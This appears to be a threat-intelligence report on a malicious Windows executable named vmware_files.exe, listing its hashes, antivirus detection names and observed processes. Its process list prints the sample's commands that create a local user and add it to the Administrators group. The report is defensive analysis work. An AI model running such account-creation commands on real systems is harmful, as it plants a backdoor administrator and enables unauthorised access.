Classification: Malicious
vmware_files.exe is a malicious file sample. Reported by 1 threat source, last seen 2024-02-19. Detected by 21 antivirus engines.
Detection summary
- 21 antivirus detections
- 0 IDS alerts
- 5 processes observed
- 0 contacted hosts
- 0 DNS requests
Blacklist sightings
| Description |
Source |
First seen |
Last seen |
Labels |
MITRE ATT&CK |
| Generic Malware |
Hybrid-Analysis |
2024-02-19 08:00:06 |
2024-02-19 08:00:06 |
|
|
Sample information
- Filenames
- vmware_files.exe
- File type
- PE32 executable (console) Intel 80386, for MS Windows
- Size
- 64000 bytes
- MD5
5684900a9c99bf35982073c396fd00d9
- SHA-1
6dc67d42f852876dc524abea287c2f235333dbfb
- SHA-256
5df0c5662e967c799e0f6708228b1cdd5c00ca1721ff50b9bc706928140ecdf2
- First indexed
- 2024-02-19 07:38:33
- Last updated
- 2026-09-03 00:50:12
Antivirus detections
| Engine | Detection |
| Arcabit | Trojan.Mint.Zard.42 |
| BitDefender | Gen:Heur.Mint.Zard.42 |
| BitDefenderTheta | Gen:NN.ZexaF.36744.dqW@ayzGIKk |
| Bkav | W32.AIDetectMalware |
| CrowdStrike | win/grayware_confidence_60% (D) |
| Cynet | Malicious (score: 100) |
| Emsisoft | Gen:Heur.Mint.Zard.42 (B) |
| FireEye | Gen:Heur.Mint.Zard.42 |
| GData | Gen:Heur.Mint.Zard.42 |
| Google | Detected |
| Ikarus | Trojan.Agent.MZ |
| Kaspersky | Trojan.Win32.Khalesi.oxjx |
| MAX | malware (ai score=83) |
| McAfee | Artemis!5684900A9C99 |
| MicroWorld-eScan | Gen:Heur.Mint.Zard.42 |
| Microsoft | Trojan:Win32/Wacatac.B!ml |
| Rising | [email protected] (RDML:KzgFP2wFhuIE3xi9+5NFFg) |
| Skyhigh | Artemis |
| TrendMicro-HouseCall | TROJ_GEN.R014H09BJ24 |
| VIPRE | Gen:Heur.Mint.Zard.42 |
| ZoneAlarm | Trojan.Win32.Khalesi.oxjx |
Process list
| Name | Command line |
| vmware_files.exe | |
| cmd.exe | /c cmd.exe /c net user hello123 hellxxx_Hxxx /ADD && net localgroup Administrators hello123 /ADD |
| cmd.exe | /c net user hello123 hellxxx_Hxxx /ADD |
| net.exe | net user hello123 hellxxx_Hxxx /ADD |
| net1.exe | %WINDIR%\system32\net1 user hello123 hellxxx_Hxxx /ADD |